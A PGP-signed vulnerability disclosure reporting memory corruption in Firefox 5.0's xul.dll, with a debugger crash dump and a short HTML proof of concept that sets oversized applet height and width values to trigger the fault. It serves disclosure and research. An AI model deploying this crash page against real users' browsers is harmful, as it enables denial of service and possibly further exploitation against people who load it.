-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=======================================================================================================
=======================================================================================================
 Mozilla Firefox 5.0 xul.dll (ver. 5.0.0.4183) Memory Corruption

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.altervista.org/

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on:
 Windows 7 Professional

 Info:
 It is possible, assigning to "HEIGHT" and\or "WIDTH" parameter a value between 8193 and 9999999, to
 corrupt memory.
 Succesfully exploitation could lead into arbitrary code execution in the context of the current user.
 The error is caused by xul!gfxRect::MoveBy

 FAULTING_IP: 
 xul!gfxRect::MoveBy+56e9
 6a0a357e 837e0417        cmp     dword ptr [esi+4],17h
 
 which lead here

 .text:1059357E           cmp     dword ptr [esi+4], 17h
 
 and registers are as follow

 ----------------------------------------------------------------
 Exception C0000005 (ACCESS_VIOLATION reading [00000004])
 ----------------------------------------------------------------
 EAX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 ECX=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
 EDX=060B0CA0: 58 03 CC 6A 01 00 00 00-FF FF FF FF FF FF FF FF
 ESP=001CC9A8: E0 2B 3D 08 64 8E 5E 6A-00 00 00 00 F2 8C 4D 6A
 EBP=05308BC0: 30 93 C7 6A 00 00 00 00-00 00 00 00 00 00 00 00
 ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 EDI=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
 EIP=6A5E357E: 83 7E 04 17 75 37 57 56-E8 2E F9 FF FF 59 8D BE
  --> CMP DWORD PTR [ESI+04],+17
 ----------------------------------------------------------------

=======================================================================================================
=======================================================================================================

 Proof of concept:
 
 <html>
  <head>
    <applet codebase = test height = 9134752 width = 9134752>
  </head>
 </html>
=======================================================================================================
=======================================================================================================

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)

iQIcBAEBAgAGBQJOBI5rAAoJEJfnJLqVA1kXukkQAIGd0g3HzG9tsfGnmANBNzFf
PxayzSxBkJetJRMb6WQBX7jYBmXNTesndz+k75sC3xCY4ssjIlbVGWtrn+AmyMLj
hvAKZHyxIvy8kutXE2uTmunKRtzsFE46GCp8TyfUfJpipWp/CyXTTj3LcLsH13ga
KNQ2AdImT+axBRkuw54fhKPMybsaHyj/xHWAqt8XPIRJbZSLdYKH8Eoj6tZQh99U
IoxrdRAVBJ2ZaI3ebDy4TGCjOYYpG5zDA0kcDR0UdROhsDdjY86MPqX2cCSIMIuX
fh09vvPZgpwoyIKpBBJtDXzJW3/EHsk/gOchDfzjrAZrEOZwpgaUi/5le0zSstgh
O49PS5oAQgWu84HWJKQOo/Vh6RJd/Gkee461hU7rVloluh9oqT9qqXe3pazAj+3g
QkhpFx2iF5WAk1L0O+n6PLhATAvpVrLTCDiOUVnzSFxwS3jpZc1SviMAiesKeetn
EDWizszQk8MZFyarbv97A3HqH8zNXWcDubT1XDSQuvVyga0NRUYJFFcDHi6wwC9x
C2VDt6VJoiSdG16M41bO0rB64nkQh/O4wTjawnC1wfJl9/uwxORhnXe2VzwyWozB
cMeSlFP1Jfy3aq7jiye91Rrvhmz6u4FQzsWgDR5jla8hvPb02BdNpdzCyJ0NhxrD
DLxiHma+8Z5cFwRyYJb/
=AMPD
-----END PGP SIGNATURE-----